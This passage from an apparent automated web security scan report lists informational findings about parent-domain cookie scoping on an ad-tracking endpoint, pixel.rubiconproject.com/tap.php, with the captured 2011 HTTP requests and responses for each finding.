Set-Cookie: ses15=12338^5&12590^5; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63868; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3151650.js^2^1315404889^1315404931&3188306.js^1^1315404900^1315404900&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:15:31 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1733

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3151650"
...[SNIP]...

8.35. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5328&nid=2025&put=f9bdca69-e609-4297-9145-48ea56a0756c&expires=730 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk15=0; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^2

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%265328%3D1; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%262874c0bb165b2b12e25b9caf%3D14742%2C0%2C1%2C%2C%265328%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; expires=Fri, 06-Sep-2013 14:14:35 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.36. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C; put_2081=OO-00000000000000000; rdk=7725/12338; rdk15=0; ses15=12338^2&12590^1; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1; expires=Fri, 07-Oct-2011 14:14:18 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:18 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; expires=Sat, 17-Sep-2011 14:14:18 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.37. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?expires=30&nid=2245&put=b6ae888c-d95b-11e0-b096-0025900e0834&v=7727 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; cd=false; au=GSAE3LG5-KKTN-10.208.77.156; lm="7 Sep 2011 14:14:35 GMT"

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%265852%3D1%267727%3D1; expires=Fri, 07-Oct-2011 14:15:00 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:15:00 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; expires=Fri, 07-Oct-2011 14:15:00 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.38. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4554&nid=1430&put=f0be7f74-7052-4a09-8aa0-ca59d82b3888&expires=180 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; csi15=3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; rdk=7856/12590; rdk15=0; ses15=12338^1&12590^1

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264554%3D1; expires=Fri, 07-Oct-2011 14:14:17 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C2%2C%2C%264554%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:17 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; expires=Mon, 05-Mar-2012 14:14:17 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.39. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6286&nid=2132&put=439524AE8C6B634E021F5F7802166020&expires=365 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=7856/12590; rdk15=0; ses15=12338^2&12590^2; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C; put_1185=2863298321806118365

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266286%3D1; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266286%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2132=439524AE8C6B634E021F5F7802166020; expires=Thu, 06-Sep-2012 14:14:25 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.40. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5852&nid=2101&put=f31d0c43-cd91-4caf-ae01-86754c3f8535 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://pixel.invitemedia.com/rubicon_sync?publisher_user_id=f772ba986ce1d14ae944dfcb2540fa9b434bfac6&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; rdk2=1; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; rdk15=0; ses15=12338^3&12590^2; csi15=3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%262874c0bb2d7a602682976bca%3D1%2660732874c0bbd63f3fd660e8a1bd%3D1%266073%3D1%265852%3D1; expires=Fri, 07-Oct-2011 14:15:03 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%262874c0bb165b2b12e25b9caf%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C23%2C%2C%262874c0bb2d7a602682976bca%3D14742%2C0%2C1%2C%2C%2660732874c0bbd63f3fd660e8a1bd%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:15:03 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; expires=Fri, 07-Oct-2011 14:15:03 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.41. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=7935&nid=2271&expires=30&put=DUSYkUQpjy1LEYeYEnMS6srZRiE HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=7856/12590; rdk15=0; ses15=12338^2&12590^2; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C; put_1185=2863298321806118365

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:25 GMT
Server: Apache/2.2.3 (CentOS)
